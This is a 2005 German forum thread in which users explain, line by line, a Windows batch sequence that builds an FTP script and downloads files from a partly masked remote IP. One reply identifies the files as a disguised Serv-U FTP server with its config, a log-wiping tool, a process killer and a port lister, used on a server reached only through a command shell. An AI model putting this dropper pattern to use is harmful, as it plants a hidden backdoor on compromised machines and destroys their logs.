kann mir jemand mal die zeilen erklären

Dieses Thema im Forum "Programmierung & Entwicklung" wurde erstellt von nero, 1. Oktober 2005 .

Schlagworte:
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 1. Oktober 2005
    moin könnte mir vielleicht mal einer erklären was bei jeder dieser zeilen passiert? so im groben kann ichs mir vorstellen. wüsste aber genre mal genau was da abläuft.


    echo open 81.***.**.*** >> c:\ftpscr.txt
    echo user anonymous ftp@ftp.com >> c:\ftpscr.txt
    echo binary >> c:\ftpscr.txt
    echo get MSIntskmngr.exe >> c:\ftpscr.txt
    echo get mspaintfixd.tmp >> c:\ftpscr.txt
    echo get clearlogs.exe >> c:\ftpscr.txt
    echo get kill.exe >> c:\ftpscr.txt
    echo get Fport.exe >> c:\ftpscr.txt
    echo quit >> c:\ftpscr.txt
    ftp -n -v -s:c:\ftpscr.txt
     

  2. Anzeige
  3. #2 1. Oktober 2005
    Code:
    echo open 81.***.**.*** >> c:\ftpscr.txt 
    echo user anonymous [EMAIL]ftp@ftp.com[/EMAIL] >> c:\ftpscr.txt
    echo binary >> c:\ftpscr.txt
    echo get MSIntskmngr.exe >> c:\ftpscr.txt
    echo get mspaintfixd.tmp >> c:\ftpscr.txt
    echo get clearlogs.exe >> c:\ftpscr.txt
    echo get kill.exe >> c:\ftpscr.txt
    echo get Fport.exe >> c:\ftpscr.txt
    echo quit >> c:\ftpscr.txt
    ftp -n -v -s:c:\ftpscr.txt 
    1. schreibt "open 81.***.**.***" in die Datei c:\ftpscr.txt
    2. schreibt "user anonymous ftp@ftp.com" in die Datei c:\ftpscr.txt
    3. schreibt "binary" in die Datei c:\ftpscr.txt
    4. schreibt "get MsIntskmngr.exe" in die Datei c:\ftpscr.txt
    5. schreibt "get mspaintfixd.tmp" in die Datei c:\ftpscr.txt
    6. schreibt "get clearlogs.exe" in die Datei c:\ftpscr.txt
    7. schreibt "get kill.exe" in die Datei c:\ftpscr.txt
    8. schreibt "get Fport.exe" in die Datei c:\ftpscr.txt
    9. schreibt "quit" in die Datei c:\ftpscr.txt
    10. ruft ftp.exe auf, dass die Befehle in der Datei c:\ftpscr.txt nacheinander ausführt.
     
  4. #3 1. Oktober 2005
    Das sind einfach ganz simple konsolenbefehle..

    echo heißt eigentlich nur ausgabe soweit ich weiß, hier wird es benutzt um eine txt-Datei (c:\ftpscr.txt) anzulegen, und diese mit ftp-Befehlen zu füllen.
    Die txt-Datei sieht dann so aus:

    Code:
    open 81.***.**.***
    user anonymous [EMAIL]ftp@ftp.com[/EMAIL]
    binary
    get MSIntskmngr.exe
    get mspaintfixd.tmp
    get clearlogs.exe
    get kill.exe
    get Fport.exe
    quit
    in der letzten zeile wird dann das tool ftp gestartet und angewiesen den inhalt der Textdatei zu verarbeiten (Verbindung öffnen, Dateien übertragen etc.)

    //Edit Hups da war jemand schneller ;)
     
  5. #4 1. Oktober 2005
    Code:
    open 81.***.**.***
    user anonymous [EMAIL]ftp@ftp.com[/EMAIL]
    binary
    get MSIntskmngr.exe
    get mspaintfixd.tmp
    get clearlogs.exe
    get kill.exe
    get Fport.exe
    quit
    das passiert wenn ftp die liste abarbeitet:

    1. Verbinde zu 81.***.**.***
    2. sage username und passwort
    3. wechsle den Transfertyp zu "binary"
    4. Lade Datei "MSIntskmngr.exe" herunter
    5. Lade Datei "mspaintfixd.tmp" herunter
    6. Lade Datei "clearlogs.exe" herunter
    7. Lade DAtei "kill.exe" herunter
    8. Lade Datei "fport.exe" herunter
    9. Trenne die Verbindung
     
  6. #5 1. Oktober 2005
    aha, sind die exe dateien schon standart auf dem server oder muß man die davor draufladen?
    was bewirken die einzelnen exe?
    bzw wieo schreibt man die befehle nicht gleich in ne txt datei? dass sie dann so aussehen wie in der ausgabe?
     
  7. #6 1. Oktober 2005
    Das sind deine eigenen DAteien.

    Also, die MSIntskmngr.exe is mit Sicherheit eine getarnte ServUDaemon.exe
    die mspainfixd.tmp is die dazugehörige ServUDaemon.ini

    ServuDaemon.exe: Öffnet einen FTP-SErver
    servUDaemno.ini: SErvUDaemon.exe holt die USEr-Date etc.
    clearlogs.exe: Löscht Log-Dateien
    kill.exe: killt einen bestimmten Prozess
    fport.exe: Listet alle Programme auf und welche Ports sie brauchen

    Du kannst sie nicht direkt in eine txt schreiben, weil du nur ne cmd auf dem Server hast. und keine GUI.
     
  8. #7 1. Oktober 2005
    ahso also wenn ich des jetzt richtig verstanden hab funzt des so:
    zuerst werden die daten auf nen server geladen ...irgenein verzeichnis.
    dann wird der obige code in nen txt file geschrieben.
    dann wird es ausgefürht und schreibt ein neues txt file auf den server und führt die darin stehende befehle aus.
     
  9. #8 1. Oktober 2005
    Nein

    zuerst wird das script in die textdatei geschrieben und dann ausgeführt
     
  10. #9 1. Oktober 2005
    und dann führt der ftp server die einzelnen schritte durch. ?! was ich jetzt noch nicht verstanden hab is des mit den getarnten dateien. wie weiß der server bzw ich was des im originalen für dateien sind bzw wie mach ich aus ner .ini ne .temp? wie rafft des der server?
     
  11. #10 1. Oktober 2005
    welcher FTP-Server ?
     
  12. #11 1. Oktober 2005
    gut sage ma eben server glaub des is ja nur für sql und mysql server
     

  13. Videos zum Thema
Die Seite wird geladen...
Similar Threads - kann mir zeilen
  1. Antworten:
    3
    Aufrufe:
    8.168
  2. Antworten:
    35
    Aufrufe:
    5.801
  3. Antworten:
    0
    Aufrufe:
    17.119
  4. Antworten:
    1
    Aufrufe:
    1.158
  5. Antworten:
    3
    Aufrufe:
    921